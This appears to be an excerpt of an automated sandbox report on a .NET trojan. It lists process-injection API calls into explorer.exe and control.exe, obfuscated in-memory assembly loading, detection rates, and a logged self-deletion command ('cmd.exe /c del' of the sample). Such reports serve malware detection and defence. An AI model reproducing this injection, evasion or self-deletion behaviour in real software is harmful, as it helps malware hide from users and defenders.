          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62DB0 NtEnumerateKey,3_2_00F62DB0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62D00 NtSetInformationFile,3_2_00F62D00
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62EE0 NtQueueApcThread,3_2_00F62EE0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62E30 NtWriteVirtualMemory,3_2_00F62E30
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62FA0 NtQuerySection,3_2_00F62FA0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F62F60 NtCreateProcessEx,3_2_00F62F60
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F63090 NtSetValueKey,3_2_00F63090
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F63010 NtOpenDirectoryObject,3_2_00F63010
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F635C0 NtCreateMutant,3_2_00F635C0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F639B0 NtGetContextThread,3_2_00F639B0
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F63D70 NtOpenThread,3_2_00F63D70
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F63D10 NtOpenProcessToken,3_2_00F63D10
          Source: C:\Windows\explorer.exeCode function: 4_2_0E74D232 NtCreateFile,4_2_0E74D232
          Source: C:\Windows\explorer.exeCode function: 4_2_0E74EE12 NtProtectVirtualMemory,4_2_0E74EE12
          Source: C:\Windows\explorer.exeCode function: 4_2_0E74EE0A NtProtectVirtualMemory,4_2_0E74EE0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D935C0 NtCreateMutant,LdrInitializeThunk,5_2_04D935C0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_04D92CA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04D92C70
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92C60 NtCreateKey,LdrInitializeThunk,5_2_04D92C60
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92DD0 NtDelayExecution,LdrInitializeThunk,5_2_04D92DD0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_04D92DF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92D10 NtMapViewOfSection,LdrInitializeThunk,5_2_04D92D10
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_04D92EA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92FE0 NtCreateFile,LdrInitializeThunk,5_2_04D92FE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92F30 NtCreateSection,LdrInitializeThunk,5_2_04D92F30
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92AD0 NtReadFile,LdrInitializeThunk,5_2_04D92AD0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04D92BF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92BE0 NtQueryValueKey,LdrInitializeThunk,5_2_04D92BE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92B60 NtClose,LdrInitializeThunk,5_2_04D92B60
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D94650 NtSuspendThread,5_2_04D94650
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D93090 NtSetValueKey,5_2_04D93090
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D93010 NtOpenDirectoryObject,5_2_04D93010
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D94340 NtSetContextThread,5_2_04D94340
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92CC0 NtQueryVirtualMemory,5_2_04D92CC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92CF0 NtOpenProcess,5_2_04D92CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92C00 NtQueryInformationProcess,5_2_04D92C00
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92DB0 NtEnumerateKey,5_2_04D92DB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D93D70 NtOpenThread,5_2_04D93D70
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D93D10 NtOpenProcessToken,5_2_04D93D10
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92D00 NtSetInformationFile,5_2_04D92D00
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92D30 NtUnmapViewOfSection,5_2_04D92D30
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92EE0 NtQueueApcThread,5_2_04D92EE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92E80 NtReadVirtualMemory,5_2_04D92E80
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92E30 NtWriteVirtualMemory,5_2_04D92E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92F90 NtProtectVirtualMemory,5_2_04D92F90
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92FB0 NtResumeThread,5_2_04D92FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92FA0 NtQuerySection,5_2_04D92FA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92F60 NtCreateProcessEx,5_2_04D92F60
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D939B0 NtGetContextThread,5_2_04D939B0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92AF0 NtWriteFile,5_2_04D92AF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92AB0 NtWaitForSingleObject,5_2_04D92AB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92B80 NtQueryInformationFile,5_2_04D92B80
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D92BA0 NtEnumerateValueKey,5_2_04D92BA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A8A360 NtCreateFile,5_2_02A8A360
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A8A490 NtClose,5_2_02A8A490
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A8A410 NtReadFile,5_2_02A8A410
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A8A540 NtAllocateVirtualMemory,5_2_02A8A540
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A8A3B3 NtCreateFile,NtReadFile,5_2_02A8A3B3
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A8A40D NtReadFile,5_2_02A8A40D
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A8A53B NtAllocateVirtualMemory,5_2_02A8A53B
          Source: UgHXEfw1uL.exe, 00000000.00000002.2070651053.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs UgHXEfw1uL.exe
          Source: UgHXEfw1uL.exe, 00000000.00000002.2074381335.000000000D330000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs UgHXEfw1uL.exe
          Source: UgHXEfw1uL.exe, 00000000.00000000.2048953937.00000000006C4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegozr.exe2 vs UgHXEfw1uL.exe
          Source: UgHXEfw1uL.exe, 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs UgHXEfw1uL.exe
          Source: UgHXEfw1uL.exe, 00000003.00000002.2122361690.0000000000C47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs UgHXEfw1uL.exe
          Source: UgHXEfw1uL.exe, 00000003.00000002.2122361690.0000000000C84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs UgHXEfw1uL.exe
          Source: UgHXEfw1uL.exe, 00000003.00000002.2122639604.000000000101D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UgHXEfw1uL.exe
          Source: UgHXEfw1uL.exe, 00000003.00000002.2122567291.0000000000EBD000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs UgHXEfw1uL.exe
          Source: UgHXEfw1uL.exeBinary or memory string: OriginalFilenamegozr.exe2 vs UgHXEfw1uL.exe
          Source: UgHXEfw1uL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: UgHXEfw1uL.exeReversingLabs: Detection: 21%
          Source: UgHXEfw1uL.exeVirustotal: Detection: 31%
          Source: UgHXEfw1uL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\UgHXEfw1uL.exe C:\Users\user\Desktop\UgHXEfw1uL.exe
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess created: C:\Users\user\Desktop\UgHXEfw1uL.exe C:\Users\user\Desktop\UgHXEfw1uL.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\UgHXEfw1uL.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeProcess created: C:\Users\user\Desktop\UgHXEfw1uL.exe C:\Users\user\Desktop\UgHXEfw1uL.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\UgHXEfw1uL.exe"Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UgHXEfw1uL.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@53/1@12/5
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, s6esr9CZHalfaTvMal.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, s6esr9CZHalfaTvMal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, s6esr9CZHalfaTvMal.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, bOaEQFmmVIlgCiiuqu.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, s6esr9CZHalfaTvMal.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, s6esr9CZHalfaTvMal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, s6esr9CZHalfaTvMal.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, bOaEQFmmVIlgCiiuqu.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: UgHXEfw1uL.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: UgHXEfw1uL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: UgHXEfw1uL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: UgHXEfw1uL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: control.pdb source: UgHXEfw1uL.exe, 00000003.00000002.2122567291.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, UgHXEfw1uL.exe, 00000003.00000002.2122361690.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4531441729.00000000009E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: UgHXEfw1uL.exe, 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.2120875685.00000000049C7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.2123652150.0000000004B77000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: UgHXEfw1uL.exe, UgHXEfw1uL.exe, 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000005.00000002.4532616564.0000000004D20000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.4532616564.0000000004EBE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.2120875685.00000000049C7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.2123652150.0000000004B77000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: UgHXEfw1uL.exe, 00000003.00000002.2122567291.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, UgHXEfw1uL.exe, 00000003.00000002.2122361690.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4531441729.00000000009E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: gozr.pdb source: explorer.exe, 00000004.00000002.4548710520.00000000108CF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000005.00000002.4531735884.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4533179411.000000000526F000.00000004.10000000.00040000.00000000.sdmp, UgHXEfw1uL.exe
          Source: Binary string: gozr.pdbSHA256 source: explorer.exe, 00000004.00000002.4548710520.00000000108CF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000005.00000002.4531735884.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.4533179411.000000000526F000.00000004.10000000.00040000.00000000.sdmp, UgHXEfw1uL.exe

          Data Obfuscation

          barindex
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, s6esr9CZHalfaTvMal.cs.Net Code: h8ya7PmBqg System.Reflection.Assembly.Load(byte[])
          Source: 0.2.UgHXEfw1uL.exe.7500000.7.raw.unpack, -Module-.cs.Net Code: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.UgHXEfw1uL.exe.7500000.7.raw.unpack, wA.cs.Net Code: _202C_206C_202E_202C_200D_200D_200F_200D_202D_202C_206F_202A_206B_202D_202D_202D_200C_206E_206E_200B_200B_202D_200C_200F_202D_206A_202A_206A_200C_202A_200B_202C_206D_202C_202E_206E_200B_206D_206E_206B_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.UgHXEfw1uL.exe.2bd1438.5.raw.unpack, -Module-.cs.Net Code: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.UgHXEfw1uL.exe.2bd1438.5.raw.unpack, wA.cs.Net Code: _202C_206C_202E_202C_200D_200D_200F_200D_202D_202C_206F_202A_206B_202D_202D_202D_200C_206E_206E_200B_200B_202D_200C_200F_202D_206A_202A_206A_200C_202A_200B_202C_206D_202C_202E_206E_200B_206D_206E_206B_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, s6esr9CZHalfaTvMal.cs.Net Code: h8ya7PmBqg System.Reflection.Assembly.Load(byte[])
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E3F71B push esp; iretd 0_2_05E3F71E
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E35191 push DC0568D5h; retf 0_2_05E3519D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_05E35390 push eax; retf 0_2_05E3539D
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 0_2_0767C692 pushad ; iretd 0_2_0767C699
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_004164CE push FFFFFFA9h; ret 3_2_004164ED
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00416CA1 push cs; retf 3_2_00416CC3
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_0041D4B5 push eax; ret 3_2_0041D508
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_0041D56C push eax; ret 3_2_0041D572
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_0041D502 push eax; ret 3_2_0041D508
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_0041D50B push eax; ret 3_2_0041D572
          Source: C:\Users\user\Desktop\UgHXEfw1uL.exeCode function: 3_2_00F209AD push ecx; mov dword ptr [esp], ecx3_2_00F209B6
          Source: C:\Windows\explorer.exeCode function: 4_2_0E60CB02 push esp; retn 0000h4_2_0E60CB03
          Source: C:\Windows\explorer.exeCode function: 4_2_0E60CB1E push esp; retn 0000h4_2_0E60CB1F
          Source: C:\Windows\explorer.exeCode function: 4_2_0E60C9B5 push esp; retn 0000h4_2_0E60CAE7
          Source: C:\Windows\explorer.exeCode function: 4_2_0E750B1E push esp; retn 0000h4_2_0E750B1F
          Source: C:\Windows\explorer.exeCode function: 4_2_0E750B02 push esp; retn 0000h4_2_0E750B03
          Source: C:\Windows\explorer.exeCode function: 4_2_0E7509B5 push esp; retn 0000h4_2_0E750AE7
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_04D509AD push ecx; mov dword ptr [esp], ecx5_2_04D509B6
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A8D4B5 push eax; ret 5_2_02A8D508
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A864CE push FFFFFFA9h; ret 5_2_02A864ED
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A8D50B push eax; ret 5_2_02A8D572
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A8D502 push eax; ret 5_2_02A8D508
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A8D56C push eax; ret 5_2_02A8D572
          Source: C:\Windows\SysWOW64\control.exeCode function: 5_2_02A86CA1 push cs; retf 5_2_02A86CC3
          Source: initial sampleStatic PE information: section name: .text entropy: 7.810545429614008
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, WyUV6Vk6R1yl3Gs8ca.csHigh entropy of concatenated method names: 'fe60Ek1JjD', 'VmR0DBmBdc', 'CoS0AAam9h', 'E8TAtDsbvT', 'IObAzkHEC1', 'Coc0bcRcqw', 'Ssw047hF8D', 'Muu0o42Bf9', 'fTd0TFiFVW', 'Hff0aKT8w9'
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, cmgPmXiboSYoa3QGE3.csHigh entropy of concatenated method names: 'UCQ2y34smJ', 'Yhj29b14Sd', 'ToString', 'CBQ2EynDMb', 'hE72cG2WxE', 'tIL2DpLTIk', 'dEt2UtUNRU', 'WYd2AxRco5', 'y5720UArOP', 'eQ82Cwnkub'
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, oB0xVLocckiv83UpuH.csHigh entropy of concatenated method names: 'CTR7fDQEE', 'cXjvFG64p', 'r3T5NNl6U', 'FrlXNyFyI', 'AdtGANQpv', 'avXjL9b2d', 'JPY2G0idXymPGfM4vj', 'mWqvXmdIEi8V2dh7bG', 'ayrqA3Ogk', 'lWhstmZLZ'
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, s6esr9CZHalfaTvMal.csHigh entropy of concatenated method names: 'sRfTMUmVL3', 'ixJTEJ7nXL', 'bfjTc1kpTu', 'EFpTD63677', 'MH4TUdTXYv', 'lVlTABwUPd', 'n0FT0gKKlR', 'rvXTCjiSqr', 'djvTBrhTim', 'vQtTyQQblU'
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, ltcgCVYv76lXvX3msa.csHigh entropy of concatenated method names: 'bs68SXGHtY', 'RSN81gANUJ', 'Rq58YacgSL', 'r1H8rLEuJA', 'oVM8PlkpCO', 'IsU8Wlar0u', 'n948Kd9Bci', 'CAQ8NiTQtl', 'r1A8fTL6a8', 'Nc68kch5ZS'
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, YAaSGg4bolrwdOLiIty.csHigh entropy of concatenated method names: 'MfOlJJrn23', 'z6plOG8D9c', 'Gi1l7o9mhR', 'KNwlvaHkem', 'ufdlZ1A9fY', 'otvl5SxWEh', 'cFElXX9Hgl', 'PdFlmXa4CV', 'mDJlGW9atx', 'lYvljX6EpK'
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, pOGZgMPdijhgp0Qug4.csHigh entropy of concatenated method names: 'daw9psHpsdJBefiKi20', 'hL0QGYHRvWb5vxIAOtS', 'kMO8OdHkX6Xrxuogwgc', 'NnaAqegFfw', 'jPcAlHYGNF', 'ADyAsc3uFb', 'BGVh6oHxpru2rgqK30a', 'BSh1pXHh8988wTlq6F4'
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, bOaEQFmmVIlgCiiuqu.csHigh entropy of concatenated method names: 'IuycY1MG3X', 'tbEcrhbbvv', 'ybJc6kroWi', 'F6MciEXqHG', 'tJrcetiQhq', 'MNtcpq3DA4', 'z3JcgurX2c', 'YxMcHLyPux', 'XiqcnYAxSD', 'jUpcttA2Cg'
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, gPrrU3HtCULuoHh1JV.csHigh entropy of concatenated method names: 'mIWqEAQsCA', 'ojKqcvbxEk', 'o0EqDA6Rvi', 'D8iqUSmvEl', 'IJDqA7kfEd', 'coBq00xpHo', 'GtHqCatAjw', 'UgnqBtGUTr', 'YWrqySl98V', 'aRMq9y9oxc'
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, hqxnSitWhtR7q3gqrG.csHigh entropy of concatenated method names: 'kOxl4PCYLN', 'O7UlTQ7W2g', 'jgWlauGVA8', 'xu8lE1AEXR', 'NSAlct2RWc', 'iTBlU2gG2t', 'hjolAIrGX8', 'NThqgd9Zbm', 'WyVqHnrRE2', 'uMvqn2etNZ'
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, jCtKcma5lJ3MbRTstQ.csHigh entropy of concatenated method names: 'sG440OaEQF', 'DVI4ClgCii', 'Yot4yER9YW', 'QDo498S8a5', 'Pg348sv2Oj', 'i3f4dTR4cV', 'x68oeVsUH22s8bVPk7', 'jaZgWPzpJlJRobALnv', 'eKm44KXJuj', 'qT84TB2ein'
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, l9qq04cS9Hl0VvYakt.csHigh entropy of concatenated method names: 'Dispose', 'pld4n1aPXB', 'HyloPwMHCv', 'wK6bb8WK0P', 'qDP4trrU3t', 'kUL4zuoHh1', 'ProcessDialogKey', 'xVCobUNuic', 'rTTo4dINRL', 'mijooDqxnS'
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, WiO20JhyCPsOCNBRkV.csHigh entropy of concatenated method names: 'GD50J7UIKW', 'Ofh0OLiZeg', 'tB107x3sY1', 'pHa0vU12cP', 'msU0ZoP1Bp', 'LUo05G15JV', 'NR50X8Sgfv', 'GIJ0mN75M4', 'XL10Gtj8eJ', 'kFs0jVWOrx'
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, qOjU3fRTR4cV4XrMI9.csHigh entropy of concatenated method names: 'IhwAMylxSP', 'vWXAcYF1fb', 'DfJAUhXcWS', 'gXIA0Nl4GH', 'YZNACuLEeS', 'O8PUe15vxo', 'XB9UpfgpZs', 'nEiUgDANC4', 'JEcUHDjJ4B', 'f3IUnBxNbL'
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, QOOq4WzxZ7R5oj4SxF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XTPlxYwhix', 'N60l8dqM86', 'vPGldTbsq5', 'acZl2AjsSa', 'SBAlqyQgYX', 'lwkllV100d', 'LO8lsqcnKJ'
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, N8a5lLjmKXGyH1g3sv.csHigh entropy of concatenated method names: 'I1YUZVPZRp', 'GNIUXpcdSt', 'xojDWYyrlR', 'hnoDKOOeX1', 'YwIDNGZvWX', 'kvNDfOWAlH', 'dupDkHETe8', 'DtpDImv7si', 'Tn3DhyWPyK', 'Y5sDSD6AwU'
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, t1gTjSu8i7T8M24dPW.csHigh entropy of concatenated method names: 'wjXxm23XpI', 'kadxGMcssy', 'AcWxR7WSlr', 'OaExPkp5Bq', 'TvLxKGnakG', 'yf0xNmwh2o', 'CHXxkkF5UR', 'hhKxIG8CPS', 'NdtxSo8LMI', 'VW1xLcuo5R'
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, faPLJtGotER9YWYDo8.csHigh entropy of concatenated method names: 'aDNDvJKnMt', 'NNnD5B2Qua', 'WTZDmlbI9a', 'OFSDGicBM5', 'UtgD8TbEQG', 'wVuDdZ8BaK', 'CwoD2I0TiA', 'JTHDqsCoWC', 'DDXDlFbRsU', 'NonDsWd9mN'
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, UyT6Qk4TMd1QQYD6Roi.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NYBsYvnOSt', 'wJGsrJnUvW', 'awWs67rIZ4', 'ovOsiTIqBN', 'D7TseSOt6J', 'hW6sp0laCd', 'CRCsgNrZl8'
          Source: 0.2.UgHXEfw1uL.exe.d330000.10.raw.unpack, ixViYDp6OhBnxDhwOt.csHigh entropy of concatenated method names: 'CcW2H0QoSi', 'rZn2tijack', 'T4wqbYaDE6', 't8Hq4Z0fnj', 'TeL2Lj7Sfw', 'Cn421GifV1', 'I6Z2uf5WAH', 'VJx2YeleE1', 'lpv2rT7LrV', 'uAp26nnCta'
          Source: 0.2.UgHXEfw1uL.exe.474ce30.6.raw.unpack, WyUV6Vk6R1yl3Gs8ca.csHigh entropy of concatenated method names: 'fe60Ek1JjD', 'VmR0DBmBdc', 'CoS0AAam9h', 'E8TAtDsbvT', 'IObAzkHEC1', 'Coc0bcRcqw', 'Ssw047hF8D', 'Muu0o42Bf9', 'fTd0TFiFVW', 'Hff0aKT8w9'
